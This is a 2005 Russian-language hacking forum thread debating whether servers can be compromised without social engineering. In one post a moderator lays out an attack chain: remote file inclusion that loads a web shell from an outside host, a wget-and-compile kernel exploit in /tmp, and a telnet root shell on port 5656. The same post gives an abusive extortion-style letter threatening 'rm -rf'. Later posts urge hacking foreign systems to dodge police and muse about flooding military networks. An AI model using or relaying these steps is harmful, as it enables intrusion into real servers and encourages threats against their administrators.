Взлом без применения социальной инженерииВозможно ли это в современных условиях?
Текущий рейтинг темы: Нет
4X_Pro
Руководитель Проекта
Настоящий Компьютерщик
Откуда: Москва Всего сообщений: 2994 Рейтинг пользователя: 79 Дата регистрации на форуме: 29 сен. 2001
|
Профиль | Сообщить модератору | ИгнорироватьNEW! Сообщение отправлено: 24 июня 2005 0:26
Вопрос такой: возможен ли в современных условиях, когда компьютерная безопасность стала целой индустрией, взлом полностью без применения социальной инженерии? На всякий случай уточню, что речь идет не о скрипт-киддинге, когда валят все, что плохо стоит (т.е. сначала изучается какая-то достаточно распространненая уязвимость, а потом ищутся объекты для взлома, в которых эта уязвимость есть), а о серьезном взломе, когда стоит задача найти уязвимость в конкретном сервере?
Просто сколько я не читал описаний различных взломов, почти везде на начальном этапе взлома так или иначе использовался "человеческий фактор", вот и стало интересно, а можно ли полностью обойтись без него?
--- Каждый человек всегда может найти, чем он может быть полезен окружающим. Проблема только в одном: слишком многие не хотят это искать.
| | |
wsx
Модератор раздела
Юниксойд, сетевик
Откуда: Казань Всего сообщений: 1074 Рейтинг пользователя: 28 Репутация пользователя: 1Дата регистрации на форуме: 14 янв. 2005
|
Профиль | Сообщить модератору | ИгнорироватьNEW! Сообщение отправлено: 24 июня 2005 11:03
Можно!!! Однако это сложно! мало кто занимается этим. Многим не хватает квалификации. Должны быть обширные знания, умения.
Но это сделать можно!
Хотя опять таки! Это вечный вопрос! ведь настраивал эти сервера человек, и опять же если он за чем то не уследил, это будет евляться человеческим фактором )
ТРЕБУЮ уточнения вопроса Всё таки взлом без соц. инженерии или без чел. фактора (второй не возможен по определению) | | |
4X_Pro
Руководитель Проекта
Настоящий Компьютерщик
Откуда: Москва Всего сообщений: 2994 Рейтинг пользователя: 79 Дата регистрации на форуме: 29 сен. 2001
|
Профиль | Сообщить модератору | ИгнорироватьNEW! Сообщение отправлено: 24 июня 2005 22:34
Уточняю: под взломом с учетом человеческого фактора имеются в виду действия, которые предполагают общение (не важно, оффлайновое или через Сеть) с кем-либо из людей, имеющих какое-либо отношение к безопасности ломаемого объекта.
--- Каждый человек всегда может найти, чем он может быть полезен окружающим. Проблема только в одном: слишком многие не хотят это искать.
| | |
wsx
Модератор раздела
Юниксойд, сетевик
Откуда: Казань Всего сообщений: 1074 Рейтинг пользователя: 28 Репутация пользователя: 1Дата регистрации на форуме: 14 янв. 2005
|
Профиль | Сообщить модератору | ИгнорироватьNEW! Сообщение отправлено: 25 июня 2005 11:13
Да, такой взлом возможен. Но, очень сложен. Т.к. требует много времени. Возможно во время взлома хакер будет пропален..
Кстати простой пример:
сайт:
www.PleasehackMe.Org/index.php?page=about.php
мы:
1. www.PleasehackMe.Org/index.php?page=http://scriptkiddie.narod.ru/shell.php
2.
в шеле..
uname -a
опаа..
Дырявое ядро..
Ищем директорию открытю на запись. По дефаулту /tmp, если админ не лох, то с тмп снимет флаг, позволяющий запускать файлы....
wget http://security.nnov.ru/exploits/Cool_Sex_With_Kernel.c /tmp
gcc /tmp/Cool_Sex_With_Kernel.c && /tmp/a.out
***Poising****
***Root Shell is waiting you on port 5656***
Далее...
telnet PleaseHackMe.org 5656
bash#_
вот простейший! именно простейший взлом без соц. инженеринга.
Да и взломо это не назовёшь...Фигня!
Далее я думаю все знают что надо делать ? Поставить РутКитаи забацать спам бота....!?!?!
О нет! вы заблуждаетесь! Пишите письмо админу!!! Но письмо должно быть грубым! Извиняюсь за мат!
Письмо:
Ты бля лох ебанный, не хуя не умеешь админить! Ты нахуй бля не админ! Залотай свой сервак! Я даю тебе 2 дня времнни, а затем rm -rf ./
ыыы.. | | |
CrocK NIK
Новичок
Всего сообщений: 7 Рейтинг пользователя: 0
Дата регистрации на форуме: 18 июля 2005
|
Профиль | Сообщить модератору | ИгнорироватьNEW! Сообщение отправлено: 18 июля 2005 8:49
Сейчас главное то что развитее безопастности идет с огромной скоростью т.к. в прошлом взломщики, создают свои фирмы по безопастности! А если ты знаешь инет и все баги как свои пять пальцев то для того что бы обойти специалиста по безопастности необходимо быть на его уровне или выше
--- ~~~CrocK NIK~~~
| | |
wsx
Модератор раздела
Юниксойд, сетевик
Откуда: Казань Всего сообщений: 1074 Рейтинг пользователя: 28 Репутация пользователя: 1Дата регистрации на форуме: 14 янв. 2005
|
Профиль | Сообщить модератору | ИгнорироватьNEW! Сообщение отправлено: 18 июля 2005 10:10
Чушь! Спецов по безопасности - еденицы!
Админов, кстати тоже...Остальные не достойны данных званий, т.к. они больше ПиАристы, Менеджеры, которые рубят бабки! и только... | | |
CrocK NIK
Новичок
Всего сообщений: 7 Рейтинг пользователя: 0
Дата регистрации на форуме: 18 июля 2005
|
Профиль | Сообщить модератору | ИгнорироватьNEW! Сообщение отправлено: 18 июля 2005 15:49
Насчет того что спецов по безопастности моло я не согласен потому что я знаю 17 челов из них 10 бывшие хакеры Но каждый спец на вес золота (если он им является)
--- ~~~CrocK NIK~~~
| | |
wsx
Модератор раздела
Юниксойд, сетевик
Откуда: Казань Всего сообщений: 1074 Рейтинг пользователя: 28 Репутация пользователя: 1Дата регистрации на форуме: 14 янв. 2005
|
Профиль | Сообщить модератору | ИгнорироватьNEW! Сообщение отправлено: 18 июля 2005 17:03
даже если взять цифру 17 !!! На всех Скрипт-Кидди, ламеров-админов, да даже на всех юзеров! это не мало ли???? | | |
CrocK NIK
Новичок
Всего сообщений: 7 Рейтинг пользователя: 0
Дата регистрации на форуме: 18 июля 2005
|
Профиль | Сообщить модератору | ИгнорироватьNEW! Сообщение отправлено: 18 июля 2005 21:39
Да но моя мысля в том что безопастность растет ! Ломать труднее сейчас для того что бы сломать путевый сайт приходится потеть минут 30 а то и больше!
--- ~~~CrocK NIK~~~
| | |
wsx
Модератор раздела
Юниксойд, сетевик
Откуда: Казань Всего сообщений: 1074 Рейтинг пользователя: 28 Репутация пользователя: 1Дата регистрации на форуме: 14 янв. 2005
|
Профиль | Сообщить модератору | ИгнорироватьNEW! Сообщение отправлено: 18 июля 2005 21:49
Ломать, ломать! Чушь всё это!
Слышали! теперь каждый пехотинец у америкососов бует иметь доступ в инет!
Пипец им кароче! Обычный ФЛУД и вся армия останется без карты и ориентиров! так же пропадёт вся связь.... | | |
wsx
Модератор раздела
Юниксойд, сетевик
Откуда: Казань Всего сообщений: 1074 Рейтинг пользователя: 28 Репутация пользователя: 1Дата регистрации на форуме: 14 янв. 2005
|
Профиль | Сообщить модератору | ИгнорироватьNEW! Сообщение отправлено: 18 июля 2005 21:51
Кстати еси чё так органы у нас не дремлят! Если и хакерите товарищи, то хакайте забугорное добро....
Я это говорю, как админ со стажем... | | |
Время выполнения скрипта: 0.0360. Количество выполненных запросов: 18, время выполнения запросов 0.0257
|